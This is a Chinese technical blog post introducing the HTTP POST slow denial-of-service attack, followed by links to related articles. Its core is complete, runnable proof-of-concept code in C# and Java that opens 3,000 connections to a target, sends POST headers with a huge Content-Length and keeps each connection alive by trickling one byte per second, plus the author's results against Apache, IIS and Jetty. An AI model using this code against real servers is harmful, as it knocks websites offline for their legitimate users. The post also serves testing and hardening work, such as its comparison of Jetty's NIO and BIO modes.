HTTP POST慢速DOS攻击初探

最新推荐文章于 2024-04-22 14:06:39 发布
最新推荐文章于 2024-04-22 14:06:39 发布
阅读量1.4k 收藏 3
点赞数
分类专栏: java 文章标签: dos socket string server header 服务器
 

1. 关于HTTP POST慢速DOS攻击

HTTP Post慢速DOS攻击第一次在技术社区被正式披露是今年的OWASP大会上,由Wong Onn Chee 和 Tom Brennan共同演示了使用这一技术攻击的威力

 

这个攻击的基本原理如下:

针对任意HTTP Server,建立一个连接,指定一个比较大的content-length,然后以很低的速度发包,比如10-100s发一个字节,hold住这个连接不断开。如果客户端持续建立这样的连接,那么服务器上可用的连接将很快被占满,从而导致DOS.

这一攻击引起我注意的原因有这几点:

1. 它可以针对任意Web服务。HTTP协议在接收到request之前是无法对请求内容作校验的,所以即使你的Web应用没有可用form表单,这个攻击一样有效。

2. 廉价。在客户端以单线程方式建立较大数量的无用连接,并保持持续发包的代价非常低廉。实际试验中一台普通PC可以建立的Socket连接在3000个以上。这对一台普通的web server,将是致命的打击。更不用说结合肉鸡群做分布式DOS了。

2. 攻击示范

为演示这个攻击,我做了一个简单的POC,C#代码如下。

using System;
using System.Collections.Generic;
using System.Text;
using System.Net.Sockets;
using System.Threading;
namespace HTTPPostDoS
{
    class TestDemo
    {
        static void Main(string[] args)
        {
            string host = "target";
            int port = 8080;
            int max_number_of_connection = 3000;
            List<TcpClient> clients = new List<TcpClient>();
            for (int i = 0; i < max_number_of_connection; i++)
            {
                TcpClient client = new TcpClient();
                clients.Add(client);
                client.Connect(host, port);
                if (client.Connected)
                {
                    string header = "POST /a HTTP/1.1\r\n" +
                                    "HOST: " + host + "\r\n" +
                                    "Connection: keep-alive\r\n" +
                                    "Keep-Alive: 900\r\n" +
                                    "Content-Length: 100000000\r\n" +
                                    "Content_Type: application/x-www-form-urlencoded\r\n" +
                                    "Accept: *.*\r\n";
                    int sent = client.Client.Send(System.Text.Encoding.Default.GetBytes(header));
                    if (sent <= 0)
                    {
                        Console.WriteLine("Error while connecting to server");
                    }
                    else
                    {
                        Console.WriteLine("Connected");
                    }
                }
            }
            while (true)
            {
                int i = 0;
                foreach (TcpClient client in clients)
                {
                    i++;
                    client.Client.Send(System.Text.Encoding.Default.GetBytes("a"));
                    Console.WriteLine("Client " + i + " just sent a byte.");
                }
                Thread.Sleep(1000);
            }
        }
    }
}


java代码如下:

package com.test.dos;

import java.io.OutputStream;
import java.io.PrintWriter;
import java.net.Socket;
import java.util.ArrayList;
import java.util.List;

public class TestDos {
	
	public static void main(String[] args) throws Exception{
		String host = "localhost";
		int port = 90;
		int max_number_of_connection = 3000;
		List<Socket> clients = new ArrayList<Socket>();
		for(int i=0;i<max_number_of_connection;i++){
			Socket client = new Socket(host,port);
			clients.add(client);
			OutputStream os = client.getOutputStream();
			PrintWriter pw=new PrintWriter(os);
			String header = "POST /a HTTP/1.1\r\n" +
            "HOST: " + host + "\r\n" +
            "Connection: keep-alive\r\n" +
            "Keep-Alive: 900\r\n" +
            "Content-Length: 100000000\r\n" +
            "Content_Type: application/x-www-form-urlencoded\r\n" +
            "Accept: *.*\r\n";
			pw.print(header);
			pw.flush();
			System.out.println("success ----------");
			
		}
		while(true){
			int k = 0;
			for(Socket ct:clients){
				k++;
				PrintWriter pwt =new PrintWriter(ct.getOutputStream());
				pwt.print("a");
				pwt.flush();
				System.out.println("client"+k+"send");
			}
			Thread.sleep(1000);
		}
	}

}


 

这段代码向目标服务器的示例Web Server发起攻击,每秒钟向服务器post一个字节以保证连接不会过期。

这个攻击对Apache的效果十分明显,Apache的maxClients几乎在瞬间被hold住,浏览器在攻击进行期间无法访问测试页面。

但是针对IIS的攻击被证明没有效果,同时我还测试了公司使用最多的Jetty,有了更多有意思的发现。

3. Jetty Server 在NIO和BIO模式下对此攻击的不同反应

在针对Jetty做测试时,我发现针对不同的Jetty Connector配置,攻击的效果有天壤之别。

我们知道Jetty在配置Connector时,可以有NIO和BIO两种模式供选择。当使用BIO模式时,Jetty的max thread被瞬间耗尽,服务停止。但是在使用NIO模式时,即使客户端的恶意socket连接数已经达到3000个,但是服务依然没有受到任何影响。这个应该很好理解,由于这两种模式下的Connector直接影响到服务端处理Socket的模型。IIS的情况我不是很清楚,但是猜测MS在实现时采用了NIO Socket模型。

详细的配置情况,请参见Jetty的官方文档

其它的Web Server,我没有做进一步测试。如有兴趣请自行验证。

 

滴答
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Http.zip_java http post
09-24
java发送http请求的一个小例子 包含get和post两种请求方式
什么是慢速攻击?如何防御慢速CC攻击?
主机吧的博客
02-12 1138
1)什么是慢速攻击 一说起慢速攻击,就要谈谈它的成名历史了。HTTP Post慢速DoS攻击第一次在技术社区被正式披露是2012年的OWASP大会上,由Wong Onn Chee 和 Tom Brennan共同演示了使用这一技术攻击的威力。 这个攻击的基本原理如下:对任何一个开放了HTTP访问的服务器HTTP服务器,先建立了一个连接,指定一个比较大的content-length,然后以非常低的速度发包,比如1-10s发一个字节,然后维持住这个连接不断开。如果客户端持续建立这样的连接,那么服务器上可用..
转帖:HTTP POST慢速DOS攻击初探
茂森的专栏
03-07 6905
HTTP POST慢速DOS攻击初探December 28th, 2010 Posted in 应用安全及黑客攻击 , 软件架构与设计1. 关于HTTP POST慢速DOS攻击<br />HTTP Post慢速DOS攻击第一次在技术社区被正式披露是今年的OWASP大会上,由Wong Onn Chee 和 Tom Brennan共同演示了使用这一技术攻击的威力。他们的slides在这里:<br />http://www.darkreading.com/galleries/security/applicat
DoS攻击、CC攻击的攻击方式和防御方法
10-27 1683
DDoS介绍 DDoS是英文Distributed Denial of Service的缩写,意即“分布式拒绝服务”,那么什么又是拒绝服务(Denial of Service)呢?可以这么理解,凡是能导致合法用户不能够访问正常网络服务的行为都算是拒绝服务攻击。也就是说拒绝服务攻击的目的非常明确,就是要阻止合法用户对正常网络资源的访问,从而达成攻击者不可告人的目的。分布式拒绝服务攻击一旦被实施,攻击网络包就会从很多DOS攻击源(俗称肉鸡)犹如洪水般涌向受害主机,从而把合法用户的网络包淹没,导致合法用户无法正
基于HTTP协议的Dos/DDos攻击的原理和实验
jackcily的博客
12-28 8664
基于HTTP协议的Dos/DDos攻击的原理和实验 如何防御(有效防御包括攻击预防,攻击检测, 追踪攻击源并攻击反击) 基于HTTP协议的Dos攻击种类 Slowloris Slowloris 原理、攻击实验及对应防御措施 Slowloris 原理 Slowloris是在2009年由web安全专家RSnake提供的一种攻击方式,原理是以极低的速度往服务器端发送HT...
HTTP DDOS攻击有什么类型和特点?
m0_70655343的博客
11-30 1626
这种类型的攻击更多是面向连接层面,以基于线程的Web服务器为目标,通过慢速请求来捆绑每个服务器线程,从而消耗服务器的线程&连接资源,这类攻击中主要可分为Slowloris、Slow Post/Read 几种攻击方式。不同于Web注入攻击场景,HTTP DDoS的攻击请求的报文特征常常处在一个难以判定好坏的区间,有时部分的异常特征不足以支撑执行拦截决策。相较于4层DDoS攻击,发起HTTP DDoS攻击往往无需构造复杂的攻击报文,仅需较少的带宽就能实现强大的攻击效果。5、攻击源分布广,隐匿性强。
SlowHTTPTest 慢***测试
无锋剑
01-19 259
   SlowHTTPTest是一个可配置的工具,模拟了一些应用程序层拒绝服务***。它可以在大多数Linux平台,OSX和Cygwin——一个类unix环境和命令行接口为窗口。        Slowloris和缓慢的HTTP POST DoS***依赖于HTTP协议的事实,通过设计,将每次发送数据包的一部分。如果一个HTTP请求是不完整的,或者如果转移率非常低,服务器保持其资源忙等待其余的...
HTTP慢速拒绝服务攻击(Slow HTTP Dos
yggcwhat
02-09 7350
HTTP慢速拒绝服务攻击简介 HTTP慢速攻击是利用HTTP合法机制,以极低的速度往服务器发送HTTP请求,尽量长时间保持连接,不释放,若是达到了Web Server对于并发连接数的上限,同时恶意占用的连接没有被释放,那么服务器端将无法接受新的请求,导致拒绝服务。 HTTP慢速攻击原理(摘抄自倾旋师傅的博客:https://payloads.online/archivers/2018-04-16/2) 既然是一个HTTP协议的缓慢攻击,这就要从HTTP协议说起了。 首先HTTP协议的报文都是一行
Dos攻击修复(slowhttptest)
iokla
09-11 4916
Slow HTTP Denial of Service Attack 中文叫作缓慢的HTTP攻击漏洞,网上多数是tomcat的修复方法,然而实际上会碰到iis,nginx,apache等web服务器的这个问题,于是就有了这个修复集合。 漏洞描述: 利用的HTTP POSTPOST的时候,指定一个非常大的content-length,然后以很低的速度发包,比如10-100s发一个字节,hold住这个连接不断开。这样当客户端连接多了后,占用住了webserver的所有可用连接,从而导致DOS。 修复方法: 对
HttpPost请求调用
12-09
HttpPost请求调用,get和post请求支持,支持txtt/xml,application/json等格式
软件安全测试·DoS·HTTP慢速攻击
06-22
一、攻击原理 2 二、测试用例设计 3 三、测试用例执行结果 4 附:slowhttptest工具使用介绍 5 1. 官方示例 5 2. 结果查看 5
http post 415错误的解决方法
10-15
主要介绍了http post 415错误的解决方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
HttpPost.zip
03-14
.net 发送http post请求代码
http post 简单 不用安装 delphi 源码
11-25
http post 简单 不用安装 delphi 源码 http post 简单 不用安装 delphi 源码
绿联搭建rustdesk服务器
最新发布
智识家的博客
04-22 395
启用仅加密,这样即便你的中继服务被他人得知,没有密钥也无使用你的服务。Web端使用,不用可不开放,没测试过怎么用。Web端使用,不用可不开放,没测试过怎么用。本服务器比较省内存,配置1GB即可。重启策略选择最后一项即可,其他默认。,因为未更改端口可以省略端口号。自己选择位置即可,必须。
Smart Link + Monitor Link 实现二层链路故障判断与主备自动切换
weixin_43075093的博客
04-18 1185
1、企业中有二层需要提高可靠性业务的主备链路;具备快速收敛性能,收敛速度可达到亚秒级,实现高效可靠。 2、运行的业务对可靠性有要求,对应的网络拓扑不适宜修改为三层链路,只能在原二层链路基础上提升可靠性; 3、采用华为智能网管型二层交换机组网,Smart Link与Monitor Link是华为私有协议; 4、遵循网络运行稳定大于一切的原则。
数据库服务的运行与登录
TLlaile的博客
04-17 454
数据库服务的运行与登录
Linux配置路由服务器
weixin_44891982的博客
04-18 311
如果想让其他主机上网,需要在2主机配置NAT规则,将其他主机的网关ip指向02主机。配置完DHCP服务后,可将其他链接主机设置为自动获取IP地址。配置02主机的DHCP服务,能够自动分配IP地址。02主机设置NAT转换。给03主机添加路由规则。
怎么直连某个服务器的dubbo服务
YHyanghaoaixin的博客
04-18 235
有时候我们可能和别的部门或者业务之间共同开发某个需求,这个时候,我们可能环境不统一,我们调用在做dubbo调用的时候,可能会调用到其他的环境,导致无法引用对方最新的代码及逻辑,所以,在某些时候,我们可能需要直接连接某个服务器的dubbo,这个时候,我们要怎么做呢?这样,我们就可以直接连接到某个服务器的dubbo接口了,但是因为这是写死的某个服务器的ip和端口,所以如果对方重启的话,那么就要更换IP和端口,这也是比较麻烦和坑人的地方。但是在环境不统一的情况下, 这也是无奈之举,只能将就进行使用。
HttpPost post = new HttpPost
08-09
HttpPost post = new HttpPost是用于发送HTTP POST请求的类。根据提供的引用,我们可以看到在创建HttpClientResult类后,使用HttpPost类来发送POST请求。根据代码中的注释,HttpPost post = new HttpPost是创建...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值